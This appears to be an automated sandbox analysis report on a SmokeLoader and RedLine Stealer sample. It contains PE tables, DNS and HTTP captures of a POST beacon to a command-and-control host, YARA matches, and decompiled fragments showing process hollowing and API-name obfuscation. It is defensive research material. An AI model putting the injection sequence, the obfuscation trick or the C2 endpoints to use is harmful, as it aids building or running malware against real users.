               IMAGE_DIRECTORY_ENTRY_BASERELOC       0x28a000         0xddc         .reloc
               IMAGE_DIRECTORY_ENTRY_DEBUG           0x1220           0x1c          .text
               IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
               IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
               IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x3150           0x40          .text
               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
               IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x1d4         .text
               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
               IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
               Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
               .text   0x1000           0x282ba       0x28400   False     0.7868788819875776   data       7.581715328183715  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
               .data   0x2a000          0x245844      0x1e00    unknown   unknown              unknown    unknown            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
               .rsrc   0x270000         0x19398       0x19400   False     0.37933168316831684  data       4.266178948669026  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
               .reloc  0x28a000         0x3338        0x3400    False     0.22581129807692307  data       2.522522475741166  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
               Name           RVA       Size    Type                                                              Language  Country
               RT_ICON        0x270730  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0
               RT_ICON        0x2715d8  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0
               RT_ICON        0x271e80  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0
               RT_ICON        0x274428  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0
               RT_ICON        0x2754d0  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0
               RT_ICON        0x275988  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0
               RT_ICON        0x276830  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0
               RT_ICON        0x2770d8  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0
               RT_ICON        0x277640  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0
               RT_ICON        0x279be8  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0
               RT_ICON        0x27ac90  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 0
               RT_ICON        0x27b618  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0
               RT_ICON        0x27bae8  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0
               RT_ICON        0x27c990  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0
               RT_ICON        0x27d238  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 0
               RT_ICON        0x27d900  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0
               RT_ICON        0x27de68  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0
               RT_ICON        0x280410  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0
               RT_ICON        0x2814b8  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0
               RT_ICON        0x281988  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0
               RT_ICON        0x282830  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0
               RT_ICON        0x2830d8  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0
               RT_ICON        0x283640  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0
               RT_ICON        0x285be8  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0
               RT_ICON        0x286c90  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 0
               RT_ICON        0x287618  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0
               RT_STRING      0x287d20  0x664   data
               RT_STRING      0x288388  0x59e   data
               RT_STRING      0x288928  0x29a   data
               RT_STRING      0x288bc8  0x248   data
               RT_STRING      0x288e10  0x582   data
               RT_GROUP_ICON  0x287a80  0x68    data
               RT_GROUP_ICON  0x275938  0x4c    data
               RT_GROUP_ICON  0x281920  0x68    data
               RT_GROUP_ICON  0x27ba80  0x68    data
               RT_VERSION     0x287ae8  0x238   data
               DLL           Import
               KERNEL32.dll  GetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, WaitForMultipleObjectsEx, GetPrivateProfileIntA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, MulDiv, GetModuleFileNameW, CreateActCtxA, WritePrivateProfileStringW, ReplaceFileA, GetStringTypeExA, GetStdHandle, GetLogicalDriveStringsA, OpenMutexW, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, AttachConsole, SleepEx, VirtualAlloc, _hwrite, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, CreateMutexA, GetFileAttributesExW, GetConsoleCursorInfo, ScrollConsoleScreenBufferA, GetCurrentThreadId, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, AddConsoleAliasW, CancelWaitableTimer, GetCommState, WaitForSingleObject, GetLongPathNameA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
               USER32.dll    CharLowerBuffA
               GDI32.dll     GetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
               ADVAPI32.dll  MapGenericMask
               Timestamp                             Source Port  Dest Port  Source IP      Dest IP
               May 28, 2023 10:43:38.398670912 CEST  49684        80         192.168.2.4    194.50.153.68
               May 28, 2023 10:43:38.423293114 CEST  80           49684      194.50.153.68  192.168.2.4
               May 28, 2023 10:43:38.423527002 CEST  49684        80         192.168.2.4    194.50.153.68
               May 28, 2023 10:43:38.424354076 CEST  49684        80         192.168.2.4    194.50.153.68
               May 28, 2023 10:43:38.424403906 CEST  49684        80         192.168.2.4    194.50.153.68
               May 28, 2023 10:43:38.448726892 CEST  80           49684      194.50.153.68  192.168.2.4
               May 28, 2023 10:43:38.449038982 CEST  80           49684      194.50.153.68  192.168.2.4
               May 28, 2023 10:43:38.546303988 CEST  80           49684      194.50.153.68  192.168.2.4
               May 28, 2023 10:43:38.546607018 CEST  49684        80         192.168.2.4    194.50.153.68
               May 28, 2023 10:43:38.547754049 CEST  49684        80         192.168.2.4    194.50.153.68
               May 28, 2023 10:43:38.572189093 CEST  80           49684      194.50.153.68  192.168.2.4
               Timestamp                             Source Port  Dest Port  Source IP    Dest IP
               May 28, 2023 10:43:38.250626087 CEST  57417        53         192.168.2.4  8.8.8.8
               May 28, 2023 10:43:38.373370886 CEST  53           57417      8.8.8.8      192.168.2.4
               May 28, 2023 10:43:38.559854984 CEST  50982        53         192.168.2.4  8.8.8.8
               May 28, 2023 10:43:39.579572916 CEST  50982        53         192.168.2.4  8.8.8.8
               May 28, 2023 10:43:40.626518011 CEST  50982        53         192.168.2.4  8.8.8.8
               May 28, 2023 10:43:42.625973940 CEST  53           50982      8.8.8.8      192.168.2.4
               May 28, 2023 10:43:43.618988991 CEST  53           50982      8.8.8.8      192.168.2.4
               May 28, 2023 10:43:44.670767069 CEST  53           50982      8.8.8.8      192.168.2.4
               Timestamp                             Source IP    Dest IP  Checksum  Code                Type
               May 28, 2023 10:43:43.619714975 CEST  192.168.2.4  8.8.8.8  cff7      (Port unreachable)  Destination Unreachable
               May 28, 2023 10:43:44.673737049 CEST  192.168.2.4  8.8.8.8  cff7      (Port unreachable)  Destination Unreachable
               Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
               May 28, 2023 10:43:38.250626087 CEST  192.168.2.4  8.8.8.8  0x1116    Standard query (0)  host-file-host6.com  A (IP address)  IN (0x0001)  false
               May 28, 2023 10:43:38.559854984 CEST  192.168.2.4  8.8.8.8  0x1637    Standard query (0)  host-host-file8.com  A (IP address)  IN (0x0001)  false
               May 28, 2023 10:43:39.579572916 CEST  192.168.2.4  8.8.8.8  0x1637    Standard query (0)  host-host-file8.com  A (IP address)  IN (0x0001)  false
               May 28, 2023 10:43:40.626518011 CEST  192.168.2.4  8.8.8.8  0x1637    Standard query (0)  host-host-file8.com  A (IP address)  IN (0x0001)  false
               Timestamp                             Source IP  Dest IP      Trans ID  Reply Code          Name                 CName  Address        Type            Class        DNS over HTTPS
               May 28, 2023 10:43:38.373370886 CEST  8.8.8.8    192.168.2.4  0x1116    No error (0)        host-file-host6.com         194.50.153.68  A (IP address)  IN (0x0001)  false
               May 28, 2023 10:43:42.625973940 CEST  8.8.8.8    192.168.2.4  0x1637    Server failure (2)  host-host-file8.com  none   none           A (IP address)  IN (0x0001)  false
               May 28, 2023 10:43:43.618988991 CEST  8.8.8.8    192.168.2.4  0x1637    Server failure (2)  host-host-file8.com  none   none           A (IP address)  IN (0x0001)  false
               May 28, 2023 10:43:44.670767069 CEST  8.8.8.8    192.168.2.4  0x1637    Server failure (2)  host-host-file8.com  none   none           A (IP address)  IN (0x0001)  false
              • oncejkc.org
                • host-file-host6.com
               Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
               0           192.168.2.4  49684        194.50.153.68   80                C:\Windows\explorer.exe
               Timestamp                             kBytes transferred  Direction  Data
               May 28, 2023 10:43:38.424354076 CEST  0                   OUT        POST / HTTP/1.1
               Connection: Keep-Alive
               Content-Type: application/x-www-form-urlencoded
               Accept: */*
               Referer: http://oncejkc.org/
               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
               Content-Length: 218
               Host: host-file-host6.com
               May 28, 2023 10:43:38.424403906 CEST  0                   OUT        Data Raw: 10 87 86 99 6c 83 a6 c3 cd 3b 09 41 77 c9 e2 8e 40 63 a2 43 d8 31 69 9e ca ec ad f2 f8 d7 93 83 6c b3 54 a9 1e 6c c4 90 9c af f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 12 c7 85 29
               Data Ascii: l;Aw@cC1ilTlwmFu$f]d)C$x^_ylGDB-Hj2rm/% ON^_PS-A.6!J!f@X)&|:Kub#*A1GmmRx[9sHowIJ
               May 28, 2023 10:43:38.546303988 CEST  1                   IN         HTTP/1.1 200 OK
               Server: nginx/1.20.2
               Date: Sun, 28 May 2023 08:43:38 GMT
               Content-Type: text/html; charset=UTF-8
               Transfer-Encoding: chunked
               Connection: close
               Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
               Data Ascii: fYour IP blocked0


              Target ID:0
              Start time:10:42:57
              Start date:28/05/2023
              Path:C:\Users\user\Desktop\01885599.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\01885599.exe
              Imagebase:0x400000
              File size:290304 bytes
              MD5 hash:A29C587C678826F4A44CF6A2A78599F1
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.530540948.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Target ID:1
              Start time:10:42:57
              Start date:28/05/2023
              Path:C:\Users\user\Desktop\01885599.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\01885599.exe
              Imagebase:0x400000
              File size:290304 bytes
              MD5 hash:A29C587C678826F4A44CF6A2A78599F1
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Target ID:3
              Start time:10:43:02
              Start date:28/05/2023
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff618f60000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:5
              Start time:10:43:39
              Start date:28/05/2023
              Path:C:\Users\user\AppData\Roaming\vbjjhwi
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\vbjjhwi
              Imagebase:0x400000
              File size:290304 bytes
              MD5 hash:A29C587C678826F4A44CF6A2A78599F1
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.622842996.00000000006B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 41%, ReversingLabs
               • Detection: 37%, Virustotal
              Reputation:low

              Target ID:6
              Start time:10:43:40
              Start date:28/05/2023
              Path:C:\Users\user\AppData\Roaming\vbjjhwi
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\vbjjhwi
              Imagebase:0x400000
              File size:290304 bytes
              MD5 hash:A29C587C678826F4A44CF6A2A78599F1
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
              Reputation:low

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 007F0156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 007F016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 007F0255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007F0270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 007F0283
                • GetThreadContext.KERNELBASE(00000000,?), ref: 007F029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007F02C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 007F02E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 007F0304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 007F032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 007F0399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007F03BF
                • SetThreadContext.KERNELBASE(00000000,?), ref: 007F03E1
                • ResumeThread.KERNELBASE(00000000), ref: 007F03ED
                • ExitProcess.KERNEL32(00000000), ref: 007F0412
                Memory Dump Source
                • Source File: 00000000.00000002.530504129.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 2875986403-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: e7e28a3bc4ea1298122236ea625666df9825257c5c089112e06cba46651a7470
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: ECB1D874A00208AFDB44CF98C895FAEBBB5FF88314F248158E608AB391D775AD41CF94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 007F0533
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530504129.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: 5fe64e8f5abb313b45e8de706aa9d15ed9feb8ffa9a7fac16eccbdc74bc6611b
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: 2C510770D0838CDAEB11CBD8C849BADBFB66F11708F144058D5446F386C7FA5669CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                E004037B0() {
                    long _v4;
                    struct HINSTANCE__* _t2;
                    int _t6;
                    long* _t11;   // never initialised in this listing; the decompiler did not recover what it points to

                    _t2 = GetModuleHandleW(L"kernel32.dll");
                    *0x667f54 = _t2;
                    // The byte stores below are emitted out of order, but together they
                    // write the NUL-terminated string "VirtualProtect" into the buffer at
                    // 0x42c718, so the API name never appears as a plain string in the file.
                    *0x42c718 = 0x56;   // 'V'
                    *0x42c719 = 0x69;   // 'i'
                    *0x42c71a = 0x72;   // 'r'
                    *0x42c71f = 0x50;   // 'P'
                    *0x42c725 = 0x74;   // 't'
                    *0x42c726 = 0;      // terminating NUL
                    *0x42c71b = 0x74;   // 't'
                    *0x42c71c = 0x75;   // 'u'
                    *0x42c71d = 0x61;   // 'a'
                    *0x42c71e = 0x6c;   // 'l'
                    *0x42c720 = 0x72;   // 'r'
                    *0x42c721 = 0x6f;   // 'o'
                    *0x42c722 = 0x74;   // 't'
                    *0x42c723 = 0x65;   // 'e'
                    *0x42c724 = 0x63;   // 'c'
                    *0x667ecc = GetProcAddress(_t2, "msimg32.dll");
                    *_t11 = 0x20;
                    *_t11 = *_t11 + 0x20;   // 0x20 + 0x20 = 0x40 = PAGE_EXECUTE_READWRITE
                    // Address, size and the new protection all come from globals; the
                    // old protection is returned through _v4.
                    _t6 = VirtualProtect(*0x667ed4, *0x667f64, *_t11, &_v4); // executed
                    return _t6;
                }


                APIs
                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004037B8
                • GetProcAddress.KERNEL32(00000000,msimg32.dll), ref: 00403831
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0040385D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: AddressHandleModuleProcProtectVirtual
                • String ID: kernel32.dll$msimg32.dll
                • API String ID: 2099061454-2650206847
                • Opcode ID: 0d811558b14423d52be23d3299fddabb9446746047720549f389ee5351b5ed6a
                • Instruction ID: d2ff6a618dc73a123dea7d8d4395d4ada67506c9c5264332cea3ef214b102018
                • Opcode Fuzzy Hash: 0d811558b14423d52be23d3299fddabb9446746047720549f389ee5351b5ed6a
                • Instruction Fuzzy Hash: AF11F1642083C2DED721D728BDC875A3F9597A9749F8440A9D08447262C7F6051ACFBF
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 007F05EC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530504129.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: ee9d201d0ce852539d4d7fced12a88faf034fafae0826f8e914c2f50d66b5ab5
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: 13011E70C0424CEADB10DBA8C5187AEBFB5AF41308F148099D5196B342D7BA9B59CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                E004033B0() {
                    struct HINSTANCE__* _t2;

                    // Out-of-order byte stores that assemble the NUL-terminated string
                    // "msimg32.dll" in the buffer at 0x42c718 (the same buffer that
                    // E004037B0 later overwrites with "VirtualProtect").
                    *0x42c721 = 0x6c;   // 'l'
                    *0x42c71b = 0x6d;   // 'm'
                    *0x42c71a = 0x69;   // 'i'
                    *0x42c71c = 0x67;   // 'g'
                    *0x42c720 = 0x64;   // 'd'
                    *0x42c723 = 0;      // terminating NUL
                    *0x42c71d = 0x33;   // '3'
                    *0x42c719 = 0x73;   // 's'
                    *0x42c722 = 0x6c;   // 'l'
                    *0x42c71f = 0x2e;   // '.'
                    *0x42c71e = 0x32;   // '2'
                    *0x42c718 = 0x6d;   // 'm' // executed
                    _t2 = LoadLibraryA("msimg32.dll"); // executed
                    return _t2;
                }


                APIs
                • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 00403407
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: LibraryLoad
                • String ID: msimg32.dll
                • API String ID: 1029625771-3287713914
                • Opcode ID: 052bd5629aa5f6efc2bd6ca4a2e95cfa120a0717947de44c5af84ff10b049836
                • Instruction ID: 05c7abdfc87ea11d598c798ceb984ce779f81a856509e5d291aaa7487a89636c
                • Opcode Fuzzy Hash: 052bd5629aa5f6efc2bd6ca4a2e95cfa120a0717947de44c5af84ff10b049836
                • Instruction Fuzzy Hash: C3F09E1074D2C2C9D722876878C97482E9583B6688F8840A9C08007263C7EA021BDFBF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040960C(intOrPtr _a4) {
                				void* _t6;
                
                				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                				 *0x42c0fc = _t6;
                				if(_t6 != 0) {
                					 *0x66e6e4 = 1;
                					return 1;
                				} else {
                					return _t6;
                				}
                			}

                APIs
                • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00404D4E,00000001), ref: 00409621
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: CreateHeap
                • String ID:
                • API String ID: 10892065-0
                • Opcode ID: 4e566d3bbde630351fb88045bf3d1e435b9961cf4413c9b4116b65a3c9ce0f13
                • Instruction ID: d28284ccdbbdcaf187e3bec61d816bcb561cddc8946e21138a7cab5a088a3787
                • Opcode Fuzzy Hash: 4e566d3bbde630351fb88045bf3d1e435b9961cf4413c9b4116b65a3c9ce0f13
                • Instruction Fuzzy Hash: 8CD0A736694745DEDB109FB5BD09B663BDCD384395F00C436F91DD6290F5B5C981CA08
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004090E1() {
                				void* _t1;
                
                				_t1 = E0040906F(0); // executed
                				return _t1;
                			}

                APIs
                • __encode_pointer.LIBCMT ref: 004090E3
                  • Part of subcall function 0040906F: TlsGetValue.KERNEL32(00000000,?,004090E8,00000000,0040D6C0,0042BCC8,00000000,00000314,?,00408984,0042BCC8,Microsoft Visual C++ Runtime Library,00012010), ref: 00409081
                  • Part of subcall function 0040906F: TlsGetValue.KERNEL32(00000005,?,004090E8,00000000,0040D6C0,0042BCC8,00000000,00000314,?,00408984,0042BCC8,Microsoft Visual C++ Runtime Library,00012010), ref: 00409098
                  • Part of subcall function 0040906F: RtlEncodePointer.NTDLL(00000000,?,004090E8,00000000,0040D6C0,0042BCC8,00000000,00000314,?,00408984,0042BCC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004090D6
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: Value$EncodePointer__encode_pointer
                • String ID:
                • API String ID: 2585649348-0
                • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                • Instruction ID: 9786210163ad4483c0a19228d0951d229a32f2fe618db9620de7aae7b9d0445c
                • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403790() {
                				void* _t2;
                
                				_t2 = LocalAlloc(0,  *0x667f64); // executed
                				 *0x667ed4 = _t2;
                				return _t2;
                			}

                APIs
                • LocalAlloc.KERNELBASE(00000000,?), ref: 00403798
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: AllocLocal
                • String ID:
                • API String ID: 3494564517-0
                • Opcode ID: 084d6743c0e473d49b09e07d7cae7b346d9820e874b07a3778090b4f1de88397
                • Instruction ID: 0ec96e80b0546baaabe1387215998cce9f50f0998a92b6cbbce2019a817ad1b3
                • Opcode Fuzzy Hash: 084d6743c0e473d49b09e07d7cae7b346d9820e874b07a3778090b4f1de88397
                • Instruction Fuzzy Hash: E7B092B01092009BD3009B50AE04B203665A348306F001091F940C1264D6B009048B14
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
